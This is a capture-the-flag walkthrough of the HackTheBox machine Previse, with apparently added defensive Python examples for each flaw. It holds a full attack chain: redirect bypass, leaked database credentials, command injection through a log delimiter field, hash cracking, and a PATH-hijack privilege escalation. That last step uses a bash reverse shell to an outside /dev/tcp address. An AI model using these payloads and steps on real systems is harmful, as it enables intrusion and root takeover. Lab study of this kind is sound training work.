This post is a walkthrough of the HackTheBox machine Previse.
HackTheBox Previse Walkthrough

Port/Vuln Enumeration
└─$ sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.10.11.104
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-29 20:38 EDT
Nmap scan report for 10.10.11.104
Host is up (0.047s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 7.11 seconds
┌──(rocky㉿kali)-[~/hckbox/previce]
└─$ sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.10.11.104
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-29 20:39 EDT
Warning: 10.10.11.104 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.104
Host is up (0.052s latency).
All 65535 scanned ports on 10.10.11.104 are open|filtered (65483) or closed (52)
Nmap done: 1 IP address (1 host up) scanned in 46.40 seconds
┌──(rocky㉿kali)-[~/hckbox/previce]
└─$ nmap -Pn -p 22,80 -sC -sV -oN details1.txt 10.10.11.104
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-31 19:45 EDT
Nmap scan report for 10.10.11.104
Host is up (0.044s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.74 seconds
Directory Scan
gobuster dir -u http://10.10.11.104 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.104
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/05/31 19:41:48 Starting gobuster in directory enumeration mode
===============================================================
/css (Status: 301) [Size: 310] [--> http://10.10.11.104/css/]
/js (Status: 301) [Size: 309] [--> http://10.10.11.104/js/]
/server-status (Status: 403) [Size: 277]
gobuster dir -u http://10.10.11.104 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.104
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2022/05/31 20:09:48 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 302) [Size: 2801] [--> login.php]
/download.php (Status: 302) [Size: 0] [--> login.php]
/login.php (Status: 200) [Size: 2224]
/files.php (Status: 302) [Size: 4914] [--> login.php]
/header.php (Status: 200) [Size: 980]
/nav.php (Status: 200) [Size: 1248]
/footer.php (Status: 200) [Size: 217]
/css (Status: 301) [Size: 310] [--> http://10.10.11.104/css/]
/status.php (Status: 302) [Size: 2966] [--> login.php]
/js (Status: 301) [Size: 309] [--> http://10.10.11.104/js/]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/accounts.php (Status: 302) [Size: 3994] [--> login.php]
/config.php (Status: 200) [Size: 0]
/logs.php (Status: 302) [Size: 0] [--> login.php]
/server-status (Status: 403) [Size: 277]
Front Page

As per the directory scan, it revealed a few PHP pages. One of them is the account creation page (accounts.php), but requesting it returns a 302 redirect.

In the browser this is just a redirect to the login page.
If I intercept the response as well, I can see the page content is there, but the redirect prevents it from loading when browsing normally.

I modify the intercepted response status from 302 to 200, and the page is now accessible.

Now create a dummy account, intercepting the response to that request in the same way and changing 302 to 200.

The user is added successfully.
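The gobuster output already shows the defect this trick relies on: several 302 responses carry multi-kilobyte bodies (accounts.php is 3994 bytes) while others are 0 bytes. A redirect issued with header('Location: ...') and no exit keeps rendering the protected page, which is exactly what the response interception reveals. The following is an added example, not code from the original post, that parses the gobuster lines above (copied in as constructed input) and flags redirects whose body is larger than a stock server redirect page; the 1024-byte threshold is an assumption.

```python
"""Flag redirect responses that still carry a full page body.
Constructed example based on the gobuster output in the write-up; not code from the post."""
import re

# Gobuster result lines copied from the scan above (constructed input for this check).
GOBUSTER_OUTPUT = """\
/index.php (Status: 302) [Size: 2801] [--> login.php]
/download.php (Status: 302) [Size: 0] [--> login.php]
/login.php (Status: 200) [Size: 2224]
/files.php (Status: 302) [Size: 4914] [--> login.php]
/header.php (Status: 200) [Size: 980]
/css (Status: 301) [Size: 310] [--> http://10.10.11.104/css/]
/status.php (Status: 302) [Size: 2966] [--> login.php]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/accounts.php (Status: 302) [Size: 3994] [--> login.php]
/config.php (Status: 200) [Size: 0]
/logs.php (Status: 302) [Size: 0] [--> login.php]
"""

# One gobuster result line: path, status code, body size (redirect target is optional).
LINE_RE = re.compile(
    r"^(?P<path>\S+)\s+\(Status:\s*(?P<status>\d+)\)\s+\[Size:\s*(?P<size>\d+)\]"
)


def parse_gobuster(text):
    """Yield (path, status, size) for each result line; banner lines do not match."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m["path"], int(m["status"]), int(m["size"])


def leaky_redirects(text, min_body=1024):
    """Paths answered with a 3xx whose body is far larger than a server-generated
    redirect page (Apache's own 301 for /css above is ~310 bytes). A multi-kilobyte
    body behind a 302 is the page that the script kept rendering after sending the
    Location header, so a client that ignores the redirect reads it in full."""
    return [
        path
        for path, status, size in parse_gobuster(text)
        if 300 <= status < 400 and size >= min_body
    ]


if __name__ == "__main__":
    for path in leaky_redirects(GOBUSTER_OUTPUT):
        print(f"redirect with page body: {path}")
```

The server-side fix is the pattern logs.php itself uses later in this write-up: header('Location: login.php'); followed immediately by exit;, so nothing after the redirect is emitted.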

Exploitation
Now log in with the new credentials.

Once logged in, a site backup file (siteBackup.zip) is available.

After checking a few of the files, config.php contains the MySQL database password:
$ unzip -d bkp siteBackup.zip
Archive: siteBackup.zip
inflating: bkp/accounts.php
inflating: bkp/config.php
inflating: bkp/download.php
inflating: bkp/file_logs.php
inflating: bkp/files.php
inflating: bkp/footer.php
inflating: bkp/header.php
inflating: bkp/index.php
inflating: bkp/login.php
inflating: bkp/logout.php
inflating: bkp/logs.php
inflating: bkp/nav.php
inflating: bkp/status.php
┌──(rocky㉿kali)-[~/hckbox/previce/backupfiles]
└─$ ls
bkp siteBackup.zip
┌──(rocky㉿kali)-[~/hckbox/previce/backupfiles]
└─$ cd bkp
┌──(rocky㉿kali)-[~/hckbox/previce/backupfiles/bkp]
└─$ ls
accounts.php config.php download.php file_logs.php files.php footer.php header.php index.php login.php logout.php logs.php nav.php status.php
┌──(rocky㉿kali)-[~/hckbox/previce/backupfiles/bkp]
└─$ cat config.php
<?php
function connectDB(){
$host = 'localhost';
$user = 'root';
$passwd = 'mySQL_p@ssw0rd!:)';
$db = 'previse';
$mycon = new mysqli($host, $user, $passwd, $db);
return $mycon;
}
?>
There are a few more files to check; logs.php is interesting as well:
└─$ cat logs.php
<?php
session_start();
if (!isset($_SESSION['user'])) {
header('Location: login.php');
exit;
}
?>
<?php
if (!$_SERVER['REQUEST_METHOD'] == 'POST') {
header('Location: login.php');
exit;
}
/////////////////////////////////////////////////////////////////////////////////////
//I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER//
/////////////////////////////////////////////////////////////////////////////////////
$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;
$filepath = "/var/www/out.log";
$filename = "out.log";
Under the Management menu tab there is a button for log data; clicking it opens the page below.

Clicking Submit downloads a log file, which looks like this:

There is a drop-down for the delimiter; if I select space, out.log is formatted differently.

The drop-down only offers a few options, but the value is under our control. Intercepting the request in Burp and changing the delimiter to rchitect changes the output like this.

Before trying a reverse shell, let's check whether a ping command appended to the delimiter parameter in Burp gets executed.

It works: I can see the ping arrive.
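The root cause in logs.php is that $_POST['delim'] is interpolated straight into the exec() string, so the delimiter becomes shell text rather than data. Below is an added example, not the box's logs.php or log_process.py, of how the delimiter handling should be written: the user's choice selects an entry in a fixed allowlist, the command is built as an argv list, and, if a shell string is ever unavoidable, every user-influenced token is quoted. The allowlist names and the SAMPLE_LOG content are assumptions (the page only shows that 'space' is one of the drop-down options).

```python
"""Delimiter handling for a log export, written so the user's choice can only select
from an allowlist and never becomes part of a command string.
Constructed example for this write-up; not the machine's own code."""
import shlex
import subprocess

# Assumed allowlist: the page shows a drop-down offering 'space' among a few options.
DELIMITERS = {
    "comma": ",",
    "space": " ",
    "tab": "\t",
}

# Constructed sample of a comma-separated file-access log, one record per line.
SAMPLE_LOG = """\
2021-06-09 12:00:01,m4lwhere,siteBackup.zip
2021-06-09 12:05:44,rchitect,report.pdf
"""


def resolve_delimiter(name: str) -> str:
    """Map the submitted name to a delimiter character; anything else is rejected.
    Exact-match lookup means shell metacharacters can never pass through."""
    try:
        return DELIMITERS[name]
    except KeyError:
        raise ValueError(f"unsupported delimiter {name!r}") from None


def build_log_command(name: str) -> list[str]:
    """argv for the helper script. The name is validated first and travels as its own
    argv element, so subprocess.run(argv) (shell=False) hands it to the script as data
    instead of to /bin/sh as command text, which is what PHP's exec() did above."""
    resolve_delimiter(name)  # raises on anything not in the allowlist
    return ["/usr/bin/python", "/opt/scripts/log_process.py", name]


def shell_safe_command(name: str) -> str:
    """If a single shell string is unavoidable, quote every token; shlex.quote here
    plays the role escapeshellarg() would play in the PHP page."""
    return " ".join(shlex.quote(part) for part in build_log_command(name))


def run_log_export(name: str) -> str:
    """How the page should invoke the helper: argv list, no shell, errors surfaced.
    Not called in this example because /opt/scripts/log_process.py is not present."""
    result = subprocess.run(build_log_command(name), check=True,
                            capture_output=True, text=True)
    return result.stdout


def reformat_log(text: str, name: str) -> list[str]:
    """The only thing the delimiter should ever do: re-join the comma-separated
    fields of each record with the selected character."""
    delim = resolve_delimiter(name)
    return [delim.join(line.split(",")) for line in text.splitlines() if line]


if __name__ == "__main__":
    print(shell_safe_command("space"))
    for record in reformat_log(SAMPLE_LOG, "space"):
        print(record)
```

With this structure the string the author injected would be rejected at resolve_delimiter() before any process is started; the quoting in shell_safe_command() is a second layer for code paths that still go through a shell.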

Initial Reverse Shell
In the same way we added the ping command, insert a netcat reverse shell payload and we get a reverse shell:


Shell as m4lwhere
The initial shell we received does not have permission to read the user.txt flag.
cd /home
ls
m4lwhere
cd m4lwhere
ls
user.txt
cat user.txt
cat: user.txt: Permission denied
Now we need to escalate to this user. We already have the MySQL credentials from config.php in the backup; the same file is present on the box under /var/www/html:
cd /var/www/html
ls -al
total 188
drwxr-xr-x 4 www-data www-data 4096 Jul 26 2021 .
drwxr-xr-x 3 root root 4096 Jul 26 2021 ..
-rw-r--r-- 1 www-data www-data 5689 Jun 12 2021 accounts.php
-rwxrwxr-x 1 www-data www-data 16042 Jun 3 2021 android-chrome-192x192.png
-rwxrwxr-x 1 www-data www-data 50545 Jun 3 2021 android-chrome-512x512.png
-rwxrwxr-x 1 www-data www-data 14096 Jun 3 2021 apple-touch-icon.png
-rw-r--r-- 1 www-data www-data 208 Jun 12 2021 config.php
drwxr-xr-x 2 www-data www-data 4096 Jul 26 2021 css
-rw-r--r-- 1 www-data www-data 1562 Jun 9 2021 download.php
-rwxrwxr-x 1 www-data www-data 724 Jun 3 2021 favicon-16x16.png
-rwxrwxr-x 1 www-data www-data 1708 Jun 3 2021 favicon-32x32.png
-rwxrwxr-x 1 www-data www-data 15406 Jun 3 2021 favicon.ico
-rw-r--r-- 1 www-data www-data 1191 Jun 12 2021 file_logs.php
-rw-r--r-- 1 www-data www-data 6107 Jun 9 2021 files.php
-rw-r--r-- 1 www-data www-data 217 Jun 3 2021 footer.php
-rw-r--r-- 1 www-data www-data 1012 Jun 6 2021 header.php
-rw-r--r-- 1 www-data www-data 551 Jun 6 2021 index.php
drwxr-xr-x 2 www-data www-data 4096 Jul 26 2021 js
-rw-r--r-- 1 www-data www-data 2967 Jun 12 2021 login.php
-rw-r--r-- 1 www-data www-data 190 Jun 8 2021 logout.php
-rw-r--r-- 1 www-data www-data 1174 Jun 9 2021 logs.php
-rw-r--r-- 1 www-data www-data 1279 Jun 5 2021 nav.php
-rwxrwxr-x 1 www-data www-data 263 Jun 3 2021 site.webmanifest
-rw-r--r-- 1 www-data www-data 1900 Jun 9 2021 status.php
cat config.php
<?php
function connectDB(){
$host = 'localhost';
$user = 'root';
$passwd = 'mySQL_p@ssw0rd!:)';
$db = 'previse';
$mycon = new mysqli($host, $user, $passwd, $db);
return $mycon;
}
?>
Let's connect to the MySQL database using the password we found:
mysql -h localhost -u root -p'mySQL_p@ssw0rd!:)'
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 6
Server version: 5.7.35-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2021, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| previse |
| sys |
+--------------------+
5 rows in set (0.00 sec)
use previse;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
show tables;
+-------------------+
| Tables_in_previse |
+-------------------+
| accounts |
| files |
+-------------------+
2 rows in set (0.00 sec)
describe accounts;
+------------+--------------+------+-----+-------------------+----------------+
| Field | Type | Null | Key | Default | Extra |
+------------+--------------+------+-----+-------------------+----------------+
| id | int(11) | NO | PRI | NULL | auto_increment |
| username | varchar(50) | NO | UNI | NULL | |
| password | varchar(255) | NO | | NULL | |
| created_at | datetime | YES | | CURRENT_TIMESTAMP | |
+------------+--------------+------+-----+-------------------+----------------+
4 rows in set (0.00 sec)
describe files;
+-------------+--------------+------+-----+-------------------+----------------+
| Field | Type | Null | Key | Default | Extra |
+-------------+--------------+------+-----+-------------------+----------------+
| id | int(11) | NO | PRI | NULL | auto_increment |
| name | varchar(255) | NO | | NULL | |
| size | int(11) | NO | | NULL | |
| user | varchar(255) | YES | | NULL | |
| data | blob | YES | | NULL | |
| upload_time | datetime | YES | | CURRENT_TIMESTAMP | |
| protected | tinyint(1) | YES | | 0 | |
+-------------+--------------+------+-----+-------------------+----------------+
7 rows in set (0.00 sec)
select * from accounts;
+----+----------+------------------------------------+---------------------+
| id | username | password | created_at |
+----+----------+------------------------------------+---------------------+
| 1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
| 2 | rchitect | $1$🧂llol$HTWNNN3FVc9pRSprpZ5fV/ | 2022-06-07 23:54:02 |
+----+----------+------------------------------------+---------------------+
2 rows in set (0.00 sec)
mysql>
Cracking the Hashes
Copy the password hash to a file and crack it with hashcat (-m 500 is md5crypt, matching the $1$ prefix):
c:\hashcat\hashcat-6.2.5\hashcat-6.2.5>.\hashcat.exe -m 500 previce.hash.txt "e:\OSCP wordlist\rockyou.txt"
hashcat (v6.2.5) starting
hipDeviceGetAttribute(): 1
Successfully initialized NVIDIA CUDA library.
With the cracked password I log in over SSH:
ssh m4lwhere@10.10.11.104
The authenticity of host '10.10.11.104 (10.10.11.104)' can't be established.
ED25519 key fingerprint is SHA256:BF5tg2bhcRrrCuaeVQXikjd8BCPxgLsnnwHlaBo3dPs.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.104' (ED25519) to the list of known hosts.
m4lwhere@10.10.11.104's password:
Permission denied, please try again.
m4lwhere@10.10.11.104's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Jun 8 00:59:08 UTC 2022
System load: 0.0 Processes: 175
Usage of /: 49.4% of 4.85GB Users logged in: 0
Memory usage: 21% IP address for eth0: 10.10.11.104
Swap usage: 0%
0 updates can be applied immediately.
Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5
m4lwhere@previse:~$ whoami
m4lwhere
m4lwhere@previse:~$ sudo -l
[sudo] password for m4lwhere:
User m4lwhere may run the following commands on previse:
(root) /opt/scripts/access_backup.sh
There is a backup script that the m4lwhere user can run as root via sudo. It is not run by any cron job; we have to invoke it ourselves. Checking the file permissions, we cannot edit the file, but we can read its contents:
m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh
#!/bin/bash
# We always make sure to store logs, we take security SERIOUSLY here
# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time
gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
m4lwhere@previse:~$ ls -al /opt/scripts/access_backup.sh
-rwxr-xr-x 1 root root 486 Jun 6 2021 /opt/scripts/access_backup.sh
Privilege Escalation to Root
The weakness here is that the script calls gzip and date by bare name, with no absolute path and no PATH set of its own, so both are resolved through the caller's PATH.
I create a simple script named gzip under /tmp and prepend /tmp to the PATH variable:
m4lwhere@previse:/tmp$ export PATH=/tmp:$PATH
m4lwhere@previse:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
m4lwhere@previse:/tmp$ sudo /opt/scripts/access_backup.sh
[sudo] password for m4lwhere:
m4lwhere@previse:/tmp$ cat gzip
#!/bin/bash
# rev shell
bash -i >& /dev/tcp/10.10.14.2/8989 0>&1
m4lwhere@previse:/tmp$ chmod +x gzip
m4lwhere@previse:/tmp$ sudo /opt/scripts/access_backup.sh
Shell as root
┌──(rocky㉿kali)-[~]
└─$ rlwrap nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.104] 56358
whoami
root
hostname
previse
ls
gzip
pspy32
systemd-private-f8ec934eb2824a399942682a61350064-apache2.service-P7UkoS
systemd-private-f8ec934eb2824a399942682a61350064-systemd-resolved.service-TGKIEq
systemd-private-f8ec934eb2824a399942682a61350064-systemd-timesyncd.service-xieqH9
vmware-root_808-2965972425
cd /root
ls -al
total 36
drwx------ 6 root root 4096 Jul 28 2021 .
drwxr-xr-x 24 root root 4096 Jul 27 2021 ..
lrwxrwxrwx 1 root root 9 Jun 6 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Jul 26 2021 .cache
drwx------ 3 root root 4096 Jul 26 2021 .gnupg
drwxr-xr-x 3 root root 4096 Jul 26 2021 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-r-------- 1 root root 33 Jun 7 23:37 root.txt
drwx------ 2 root root 4096 Jul 26 2021 .ssh
lrwxrwxrwx 1 root root 9 Jul 28 2021 .viminfo -> /dev/null
ls root.txt
root.txt
ls -al root.txt
-r-------- 1 root root 33 Jun 7 23:37 root.txt
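The escalation above works because access_backup.sh resolves gzip and date through whatever PATH the sudo caller supplies. The following added example (not part of the original post or the box) audits a script text for exactly that: command words looked up by bare name and the absence of a PATH assignment. VULNERABLE_SCRIPT is the access_backup.sh body shown above; HARDENED_SCRIPT is a rewrite constructed here that pins PATH and uses absolute binaries, and the audit passes it clean. The builtin list and regexes are this example's own simplifications.

```python
"""Audit a script that runs under sudo for PATH-dependent command lookups.
Constructed example for this write-up; HARDENED_SCRIPT is not the machine's file."""
import re

# The two command lines from /opt/scripts/access_backup.sh as shown in the write-up.
VULNERABLE_SCRIPT = """\
#!/bin/bash
# We always make sure to store logs, we take security SERIOUSLY here
gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
"""

# Constructed rewrite: fixed PATH, absolute binaries, strict mode, private output files.
HARDENED_SCRIPT = """\
#!/bin/bash
# Hardened rewrite (example): PATH is set by the script, binaries are absolute
set -euo pipefail
export PATH=/usr/bin:/bin
umask 077
STAMP=$(/bin/date --date="yesterday" +%Y%b%d)
/bin/gzip -c /var/log/apache2/access.log > "/var/backups/${STAMP}_access.gz"
/bin/gzip -c /var/www/file_access.log > "/var/backups/${STAMP}_file_access.gz"
"""

# Shell builtins and keywords are never resolved through PATH, so they are not findings.
BUILTINS = {"set", "export", "umask", "cd", "echo", "exit", "if", "then", "else",
            "elif", "fi", "for", "while", "do", "done", "return", "local", "readonly"}

# A command word is the first token of a line or the first token after $( | && ;
# A word followed by '=' is a variable assignment and a word starting with '/' is
# already an absolute path, so neither matches.
COMMAND_RE = re.compile(r"(?:^|\$\(|\||&&|;)\s*([A-Za-z_][\w.-]*)\b(?!=)")
PATH_SET_RE = re.compile(r"^\s*(?:export\s+)?PATH=")


def audit_script(text):
    """Return (line_no, kind, detail) findings: every bare command name that will be
    resolved via PATH, plus a leading 'path-not-set' finding if the script never
    assigns PATH itself (line 0 marks a whole-script finding)."""
    findings = []
    sets_path = False
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):   # blank, comment, shebang
            continue
        if PATH_SET_RE.match(line):
            sets_path = True
        for cmd in COMMAND_RE.findall(line):
            if cmd not in BUILTINS:
                findings.append((lineno, "relative-command", cmd))
    if not sets_path:
        findings.insert(0, (0, "path-not-set", "PATH inherited from the caller"))
    return findings


if __name__ == "__main__":
    for label, script in (("vulnerable", VULNERABLE_SCRIPT), ("hardened", HARDENED_SCRIPT)):
        print(label, audit_script(script) or "clean")
```

Two caveats a reviewer would add: stock Ubuntu sudoers carries Defaults secure_path=..., which resets PATH for every sudo command, so the hijack succeeding here implies that default was not in effect on this box; and the audit only catches bare command names, not a script that is itself writable or that sources a writable file.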
Key Learnings
The first directory scan only revealed directories; always rerun it with the relevant file extensions (php, css, etc.). That is what revealed the account creation page.
Here we also intercepted the response to see why account creation was blocked. Changing the 302 response to 200 allowed us to create an account.
Before sending a reverse shell payload, test with a ping command to see whether the site executes the modified request. Here the ping confirmed the command injection.
Get familiar with MySQL commands, since in many cases we obtain a MySQL username and password. hashcat then cracks the recovered hashes.
If a user can run a script as root and cannot modify the script itself, look at the commands the script calls. Here either gzip or date could have been hijacked, because the script does not specify the full path of these binaries (e.g. /usr/bin/...). So we prepended /tmp to PATH and created an executable gzip script there containing the reverse shell.